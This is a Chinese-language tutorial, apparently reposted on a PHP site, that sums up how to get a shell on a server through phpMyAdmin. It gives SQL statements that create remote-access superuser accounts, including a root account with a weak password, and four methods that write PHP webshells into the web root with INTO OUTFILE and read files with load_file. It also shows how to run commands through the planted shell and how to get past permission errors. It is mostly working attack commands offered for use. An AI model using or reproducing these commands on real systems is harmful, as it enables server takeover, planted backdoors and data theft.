Rumah > pangkalan data > phpMyAdmin > teks badan

总结PHPmyadmin拿shell

藏色散人
Lepaskan: 2021-01-04 14:37:48
ke hadapan
1956 orang telah melayarinya

下面由phpmyadmin使用教程栏目给大家总结phpmyadmin拿shell,希望对需要的朋友有所帮助!

总结PHPmyadmin拿shell

PHPmyadmin拿shell总结

 

PHPmyadmin修改用户密码

直接点击上面的localhost或者1270.0.1,出现用户一栏,点击修改即可

 

添加超级用户guetsec密码ooxx并且允许外连

GRANT ALL PRIVILEGES ON *.* TO 'guetsec'@'%' IDENTIFIED BY 'ooxx' WITH GRANT OPTION;
Salin selepas log masuk

我们可以创建root账户设置密码

GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;
Salin selepas log masuk

这样就创建了root外联账户,密码123456,外链时用123456

拿shell四种经典方法:

方法一:

CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
INSERT INTO `mysql`.`study` (`7on` )VALUES (&#39;<?php @eval_r($_POST[7on])?>&#39;);
SELECT 7onFROM study INTO OUTFILE &#39;E:/wamp/www/7.php&#39;;
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
    一句话连接密码:7on
Salin selepas log masuk

方法二:

读取文件内容:    select load_file(&#39;E:/xamp/www/s.php&#39;);
写一句话:    select &#39;<?php @eval_r($_POST[cmd])?>&#39;INTO OUTFILE &#39;E:/xamp/www/study.php&#39;
cmd执行权限:    select &#39;<?php echo \&#39;<pre class="brush:php;toolbar:false">\&#39;;system($_GET[\&#39;cmd\&#39;]); echo \&#39;
\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
Salin selepas log masuk

方法三:

JhackJ版本 PHPmyadmin拿shell

Create TABLE study (cmd text NOT NULL);
Insert INTO study (cmd) VALUES(&#39;<?php eval_r($_POST[cmd])?>&#39;);
select cmd from study into outfile &#39;E:/wamp/www/7.php&#39;;
   
Drop TABLE IF EXISTS study;
   
<?php eval_r($_POST[cmd])?>
--------------------------------------------------------------------------------
<?php @eval_r($_POST[cmd])?>
   
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
INSERT INTO study( cmd ) VALUES (&#39;<?php eval_r($_POST[cmd])?>&#39;);# 影响列数: 1
SELECT cmdFROM study INTO OUTFILE &#39;E:/wamp/www/7.php&#39;;# 影响列数: 1
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
Salin selepas log masuk

方法四:

select load_file(&#39;E:/xamp/www/study.php&#39;);
select &#39;<?php echo \&#39;<pre class="brush:php;toolbar:false">\&#39;;system($_GET[\&#39;cmd\&#39;]); echo \&#39;
\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
Salin selepas log masuk

然后访问网站目录:http://www.2cto.com/study.php?cmd=dir

 

Phpmyadmin导出一句话时出现(Errcode: 13 - Permission denied)

是对此目录没有权限,可以试试上级目录,或者下级目录

 

再不行试试NTS引流

还有就是注意目录\

Atas ialah kandungan terperinci 总结PHPmyadmin拿shell. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!

Label berkaitan:
sumber:cnblogs.com
Kenyataan Laman Web ini
Kandungan artikel ini disumbangkan secara sukarela oleh netizen, dan hak cipta adalah milik pengarang asal. Laman web ini tidak memikul tanggungjawab undang-undang yang sepadan. Jika anda menemui sebarang kandungan yang disyaki plagiarisme atau pelanggaran, sila hubungi admin@php.cn
Tutorial Popular
Lagi>
Muat turun terkini
Lagi>
kesan web
Kod sumber laman web
Bahan laman web
Templat hujung hadapan